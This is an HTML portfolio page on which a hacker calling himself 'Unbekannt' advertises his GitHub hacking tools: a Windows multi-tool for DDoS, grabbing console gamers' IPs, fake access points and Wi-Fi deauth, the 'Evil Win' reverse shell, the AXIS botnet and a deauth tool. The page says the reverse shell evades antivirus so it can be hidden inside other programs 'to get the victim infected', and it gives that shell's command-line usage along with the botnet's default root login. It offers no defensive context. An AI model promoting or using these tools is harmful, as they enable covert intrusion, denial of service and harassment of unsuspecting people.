<!DOCTYPE html>

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Unbekannt</title>
  <link rel="icon" href="https://camo.githubusercontent.com/15f2ff502078a5b460482d358bbd7fb92b9707bf9c2e51a18abe9c3090977818/68747470733a2f2f63646e2e646973636f72646170702e636f6d2f6174746163686d656e74732f3830383632303338373339303332343734362f3939333238343438393932373230343930342f6c6f676f2e706e67">
</head>
<body>

<style type="text/css">
body {
  font-family: monospace;
  background-color: #222225;
}


#MLine {
  font-size: 19px;
  margin-left: 22px;
}

#PreMText {
  color: #d1082d; /*#d3d4d7;*/
  font-size: 19px;
}

#m2text {
  color: #d3d4d7;
  font-size: 19px;
  margin-left: 22px;
  margin-bottom: 1px;
}


#mtext {
  color: #d3d4d7;
  font-size: 19px;
  margin-left: 22px;
  margin-bottom: 30px;
}

#mtext2 {
  color: #d1082d;
  font-size: 19px;
  margin-left: 22px;
  margin-bottom: 50px;
}

#PATG {
  margin-top: 30px;
  font-size: 21px;
  margin-left: 22px;
}

#PAT {
  font-size: 24px;
  margin-left: 22px;
}

#main {
  margin-top: 60px;
}

#top {
  text-align: left;
  margin-left: 17px;
  margin-top: 15px;
}

#top2 {
  font-family: monospace;
  text-align: left;
  margin-left: 17px;
  margin-bottom: 30px;
}

#sqLine {
  font-family: monospace;
  font-size: 19px;
}

#sLine {
  font-family: monospace;
  font-size: 32px;
}

#qLine {
  font-family: monospace;
  font-size: 19px;
  margin-right: 20px;
}

#rLine {
  font-family: monospace;
  font-size: 27px;
}

#rsLine {
  font-family: monospace;
  font-size: 27px;
  margin-left: 8px;
}

a:link  {
  color: #9ea6b4;
  background-color: transparent;
  text-decoration: none;
}

a:visited {
  color: #9ea6b4;
  background-color: transparent;
  text-decoration: none;
}

a:hover {
  color: #d1082d;
  background-color: transparent;
  text-decoration: underline;
}

a:active {
  color: #d1082d;
  background-color: transparent;
  text-decoration: underline;
}
</style>


  <div id="top">
    <span id="sLine" style="color:white;"><b>&gt; </b></span>
    <span id="sLine" style="color:#d1082d;"><b>Unbekannt |</b></span> 
    <span id="rsLine"><a href="https://github.com/i-am-unbekannt">GitHub</a> </span>
    <span id="rLine"><a href="https://instagram.com/i_am_unbekannt">Instagram</a></span>
  </div>

  <div id="main">
    <span id="PAT" style="color:white;"><b>What are these Tools?</b></span>
    <div id="PATG">
      <span style="color:#d3d4d7;"><b style="color:#d1082d;">&gt; </b>All Tools are available on my | <a style="color:#d1082d;" href="https://github.com/i-am-unbekannt">GitHub</a></span>
    </div>
    <pre id="m2text"><output>
All these Tools are Hacking and Pentesting Tools for Linux or Windows. you can use these tools by yourself for Hacking or Pentesting.
Here you can find all my tools with some information about them what there can do and how they work. 
some options you have: <a id="PreMText" href="https://www.acunetix.com/blog/web-security-zone/what-is-reverse-shell/"><b>Reverse TCP Shells</b></a>, <a id="PreMText" href="https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack"><b>Deauthing</b></a>, <a id="PreMText" href="https://www.investopedia.com/terms/s/spoofing.asp"><b>Spoofing</b></a>, <a id="PreMText" href="https://en.wikipedia.org/wiki/Denial-of-service_attack"><b>DDoS Attacks</b></a>, <b id="PreMText">Network Scanning</b>, <a id="PreMText" href="https://en.wikipedia.org/wiki/Botnet"><b>Botnet</b></a> and more.
<b>Note: By using any of these softwares, you agree that any damage caused by you is your fault!</b>
    </output></pre>
    <div id="top2">
      <span id="sqLine" style="color:white;"><b>&gt; </b></span>
      <span id="sqLine" style="color:#d1082d;"><b>Jump To |</b></span> 
      <span id="qLine"><a href="https://i-am-unbekannt.github.io/#U">Unbekannt-Framework</a></span>
      <span id="qLine"><a href="https://i-am-unbekannt.github.io/#E">Evil-Win</a></span>
      <span id="qLine"><a href="https://i-am-unbekannt.github.io/#A">AXIS-BotNet</a></span>
      <span id="qLine"><a href="https://i-am-unbekannt.github.io/#W">WireFyte</a></span>
    </div>

    <pre id="mtext2"><output>--------------------------------------------------------------------------------------------------------------------------------------</output></pre>

    <section id="U">
      <span id="PAT" style="color:white;"><b>Unbekannt Framework</b></span>
      <pre id="mtext"><output>The <a id="PreMText" href="https://github.com/i-am-unbekannt/unbekannt-framework"><b>Unbekannt Framework</b></a> is a Hacking and Pentesting multi tool for Windows. In the future this tool get more updates with 
more functions and modules. With the <a id="PreMText" href="https://github.com/i-am-unbekannt/unbekannt-framework"><b>Unbekannt Framework</b></a> you have the following functions:

<b style="color:#d1082d;">&gt; </b>ping an ip address to see if the host is up or down
<b style="color:#d1082d;">&gt; </b>lookup an ip address to see geo location and more
<b style="color:#d1082d;">&gt; </b>scan an entire network for available ip and mac addresses
<b style="color:#d1082d;">&gt; </b>scan an ip address to see all open ports
<b style="color:#d1082d;">&gt; </b>ddos ip addresses or sites
<b style="color:#d1082d;">&gt; </b>pull/grabb IPs from PSN/XBOX/PC users 
<b style="color:#d1082d;">&gt; </b>locate PSN/XBOX/PC gamertags 
<b style="color:#d1082d;">&gt; </b>send an anonymous sms every 24 hours
<b style="color:#d1082d;">&gt; </b>local <a id="PreMText" href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol"><b>TCP</b></a> chat
<b style="color:#d1082d;">&gt; </b>mobaxtern a enhanced terminal for windows with x11 server
<b style="color:#d1082d;">&gt; </b>create fake access points
<b style="color:#d1082d;">&gt; </b>create a reverse <a id="PreMText" href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol"><b>TCP</b></a> shell
<b style="color:#d1082d;">&gt; </b>deauth specific BSSID/CHANNEL
<b style="color:#d1082d;">● </b>Check out tool and more infos <a id="PreMText" href="https://github.com/i-am-unbekannt/unbekannt-framework"><b>here</b></a>
      </output></pre>
    </section>

    <pre id="mtext2"><output>--------------------------------------------------------------------------------------------------------------------------------------</output></pre>

    <section id="E">
      <span id="PAT" style="color:white;"><b>Evil Win</b></span>
      <pre id="mtext"><output><a id="PreMText" href="https://github.com/i-am-unbekannt/Evil-Win"><b>Evil Win</b></a> is a Windows Reverse <a id="PreMText" href="https://en.wikipedia.org/wiki/Transmission_Control_Protocol"><b>TCP</b></a> shell for Hacking and Pentesting. The shell (shell.exe) is undetected by the windows antivirus 
so you can easily include the shell into other programs to get the victim infected and remote access. 

Usage to create shell/listener:
<b style="color:#d1082d;">&gt; </b>python3 Evil-Win.py [host ip] [port]

Usage to connect to host:
<b style="color:#d1082d;">&gt; </b>shell.exe [host ip] [port] 
<b style="color:#d1082d;">● </b>Check out tool and more infos <a id="PreMText" href="https://github.com/i-am-unbekannt/Evil-Win"><b>here</b></a>
      </output></pre>
    </section>

    <pre id="mtext2"><output>--------------------------------------------------------------------------------------------------------------------------------------</output></pre>

    <section id="A">
      <span id="PAT" style="color:white;"><b>AXIS Botnet</b></span>
      <pre id="mtext"><output>The <a id="PreMText" href="https://github.com/i-am-unbekannt/AXIS"><b>AXIS</b></a> <a id="PreMText" href="https://en.wikipedia.org/wiki/Botnet"><b>BotNet</b></a> is a collection of internet-connected devices, which may include personal computers, servers, mobile devices and IoT
<a id="PreMText" href="https://en.wikipedia.org/wiki/Internet_of_things"><b>(internet of things)</b></a> devices, that are infected and controlled by a common type of malware, often unbeknownst to their owner.

SSH Configuration:
<b style="color:#d1082d;">&gt; </b>Port: 909
<b style="color:#d1082d;">&gt; </b>Type: <a id="PreMText" href="https://docs.oracle.com/cd/E19118-01/n1.sprovsys51/819-1655/ekqwr/index.html"><b>RAW</b></a>

Login (default):
<b style="color:#d1082d;">&gt; </b>username: root
<b style="color:#d1082d;">&gt; </b>password: root
<b style="color:#d1082d;">● </b>Check out tool and more infos <a id="PreMText" href="https://github.com/i-am-unbekannt/AXIS"><b>here</b></a>
      </output></pre>
    </section>

    <pre id="mtext2"><output>--------------------------------------------------------------------------------------------------------------------------------------</output></pre>

    <section id="W">
      <span id="PAT" style="color:white;"><b>WireFyte</b></span>
      <pre id="mtext">Create up to 32 networks with custom names or <output><a id="PreMText" href="https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack"><b>Deauth</b></a> Networks, Bssids and whole channels. <b>(only for linux)</b> 
This tool only works on a real system with access to a network interface.

<b style="color:#d1082d;">● </b>Check out tool and more infos <a id="PreMText" href="https://github.com/i-am-unbekannt/WireFyte"><b>here</b></a>
      </output></pre>
    </section>

    <p id="mtext">I will win, I always win.<a id="mtext" href="https://instagram.com/i_am_unbekannt">~U</a></p>

  </div>
</body></html>
